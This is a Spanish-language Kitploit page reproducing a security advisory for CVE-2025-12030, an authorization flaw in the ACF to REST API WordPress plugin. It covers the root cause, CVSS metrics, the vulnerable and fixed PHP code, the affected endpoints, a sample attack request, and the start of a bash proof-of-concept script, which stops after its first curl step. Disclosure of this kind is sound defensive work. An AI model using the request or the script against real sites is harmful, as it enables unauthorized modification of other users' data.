Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-12030 — ACF to REST API WordPress Plugin IDOR Vulnerability (CVE-2025-12030) - Fallo de seguridad que permite a usuarios autenticados con acceso de nivel Colaborador modificar campos ACF en objetos que no poseen. | Kitploit
Herramientas/GitHubGitHub/snailsploit/cve-2025-12030
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónPapers e InvestigaciónAprendizaje y Educación
GitHubsnailsploit/cve-2025-12030

CVE-2025-12030

ACF to REST API WordPress Plugin IDOR Vulnerability (CVE-2025-12030) - Fallo de seguridad que permite a usuarios autenticados con acceso de nivel Colaborador modificar campos ACF en objetos que no poseen.

Ver Repositorio
16hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-12030: Referencia Directa Insegura a Objetos en el Plugin ACF to REST API de WordPress

CVE CVSS Score WordPress Plugin CWE-639 Wordfence

Palabras clave: CVE-2025-12030, vulnerabilidad de ACF to REST API, IDOR, seguridad de WordPress, explotación autenticada, vulnerabilidad de plugin de WordPress, CWE-639, modificación de campos ACF, omisión de autorización, WordPress CVE 2025, Advanced Custom Fields, seguridad de la API REST

Tabla de contenidos

  • Descripción general
  • Detalles de la vulnerabilidad
  • Análisis técnico
  • Vector de ataque
  • Prueba de concepto
  • Guía de remediación
  • Detección
  • Métricas CVSS
  • Referencias
  • Créditos
  • Contacto de seguridad

Descripción general

Vulnerabilidad IDOR del Plugin ACF to REST API de WordPress (CVE-2025-12030) - Fallo de seguridad que permite a usuarios autenticados con acceso de nivel Colaborador modificar campos ACF en objetos que no poseen.

Se descubrió una vulnerabilidad de Referencia Directa Insegura a Objetos (IDOR) en el Plugin ACF to REST API de WordPress que permite a atacantes autenticados con privilegios mínimos modificar campos ACF en toda la instalación de WordPress.

Descubierto por: Kai Aizen (SnailSploit)
Publicado: 6 de enero de 2026
Puntuación CVSS: 4.3 (Medio)
CWE: CWE-639 - Omisión de autorización a través de clave controlada por el usuario
Plugin: ACF to REST API
Slug del plugin: acf-to-rest-api
Tipo de ataque: Referencia Directa Insegura a Objetos (IDOR)
Privilegios requeridos: Contributor+ (Ataque autenticado)

Detalles de la vulnerabilidad

Descripción

El plugin ACF to REST API para WordPress es vulnerable a Referencia Directa Insegura a Objetos en todas las versiones hasta la 3.3.4 inclusive. Esto se debe a verificaciones de capacidad insuficientes en el método update_item_permissions_check(), que solo verifica que el usuario actual tenga la capacidad edit_posts sin comprobar permisos específicos del objeto (por ejemplo, edit_post($id), edit_user($id), manage_options).

Impacto

Esta vulnerabilidad permite a atacantes autenticados con acceso de nivel Colaborador y superior:

  • Modificar campos ACF en publicaciones que no poseen - Evitar restricciones de propiedad de publicaciones
  • Modificar campos ACF en cualquier cuenta de usuario - Incluyendo cuentas de administrador
  • Modificar campos ACF en comentarios - Alterar metadatos de comentarios
  • Modificar campos ACF en términos de taxonomía - Cambiar campos personalizados de categorías/etiquetas
  • Modificar la página de opciones globales - Acceder a opciones ACF de todo el sitio sin la capacidad manage_options

Todas las modificaciones son posibles a través de los endpoints de la API REST /wp-json/acf/v3/{type}/{id}.

Versiones afectadas

  • Vulnerable: Todas las versiones ≤ 3.3.4
  • Parcheado: ⚠️ No hay parche conocido disponible

Métricas CVSS v3.1```

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

| Métrica | Valor |
|--------|-------|
| Vector de ataque | Red (AV:N) |
| Complejidad de ataque | Baja (AC:L) |
| Privilegios requeridos | Bajos (PR:L) |
| Interacción del usuario | Ninguna (UI:N) |
| Alcance | No cambia (S:U) |
| Confidencialidad | Ninguna (C:N) |
| Integridad | Baja (I:L) |
| Disponibilidad | Ninguna (A:N) |

**Desglose de CVSS v3.1:**

- **Vector de ataque (AV):** Red - La vulnerabilidad puede explotarse de forma remota a través de una red
- **Complejidad de ataque (AC):** Baja - No se requieren condiciones especiales para la explotación
- **Privilegios requeridos (PR):** Bajos - Requiere autenticación de nivel Colaborador
- **Interacción del usuario (UI):** Ninguna - La explotación funciona sin interacción del usuario
- **Alcance (S):** No cambia - La vulnerabilidad solo afecta al componente vulnerable
- **Impacto de confidencialidad (C):** Ninguno - No hay divulgación de información
- **Impacto de integridad (I):** Bajo - Modificación no autorizada de los campos ACF
- **Impacto de disponibilidad (A):** Ninguno - Sin impacto en la disponibilidad

## Detalles técnicos

### Causa raíz de la vulnerabilidad

La vulnerabilidad existe en el método `update_item_permissions_check()` el cual realiza una autorización insuficiente:```php
// Vulnerable code pattern (simplified)
public function update_item_permissions_check( $request ) {
    // VULNERABLE: Only checks generic edit_posts capability
    if ( current_user_can( 'edit_posts' ) ) {
        return true;
    }
    return false;
}

La implementación adecuada debe verificar los permisos específicos del objeto:```php // Secure implementation pattern public function update_item_permissions_check( $request ) { $id = $request->get_param( 'id' ); $type = $request->get_param( 'type' );

switch ( $type ) {
    case 'post':
        return current_user_can( 'edit_post', $id );
    case 'user':
        return current_user_can( 'edit_user', $id );
    case 'option':
        return current_user_can( 'manage_options' );
    // ... other object types
}
return false;

}

### Endpoints Vulnerables

| Endpoint | Objetivo | Capacidad Requerida (Debería Ser) |
|----------|--------|--------------------------------|
| `/wp-json/acf/v3/posts/{id}` | Entradas | `edit_post($id)` |
| `/wp-json/acf/v3/pages/{id}` | Páginas | `edit_page($id)` |
| `/wp-json/acf/v3/users/{id}` | Usuarios | `edit_user($id)` |
| `/wp-json/acf/v3/comments/{id}` | Comentarios | `edit_comment($id)` |
| `/wp-json/acf/v3/terms/{taxonomy}/{id}` | Términos | `edit_term($id)` |
| `/wp-json/acf/v3/options/{option}` | Opciones | `manage_options` |

### Vector de Ataque```
PUT/POST /wp-json/acf/v3/{type}/{id}
Authorization: Basic <contributor_credentials>
Content-Type: application/json

{
    "fields": {
        "field_name": "malicious_value"
    }
}

La vulnerabilidad puede ser explotada a través de la API REST de WordPress por cualquier usuario autenticado con al menos el rol de Colaborador.

Prueba de concepto

⚠️ Solo con fines educativos y de pruebas autorizadas

Bash PoC```bash

#!/bin/bash

CVE-2025-12030 PoC - ACF to REST API IDOR

TARGET_URL="$1" USERNAME="$2" APP_PASSWORD="$3" TARGET_POST_ID="$4"

if [ -z "$TARGET_URL" ] || [ -z "$USERNAME" ] || [ -z "$APP_PASSWORD" ] || [ -z "$TARGET_POST_ID" ]; then echo "Usage: $0 <target_url> <app_password> <post_id>" echo "Example: $0 https://example.com contributor_user xxxx-xxxx-xxxx 42" exit 1 fi

echo "[] CVE-2025-12030 - ACF to REST API IDOR PoC" echo "[] Target: $TARGET_URL" echo "[*] Target Post ID: $TARGET_POST_ID" echo ""

Encode credentials

AUTH=$(echo -n "$USERNAME:$APP_PASSWORD" | base64)

Step 1: Read current ACF fields (verify access)

echo "[*] Step 1: Reading current ACF fields..." curl -s -X GET "$TARGET_URL/wp-json/acf/v3/posts/$TARGET_POST_ID"
-H "Authorization: Basic $AUTH"
| python3 -m json.tool

echo ""

Descargar herramienta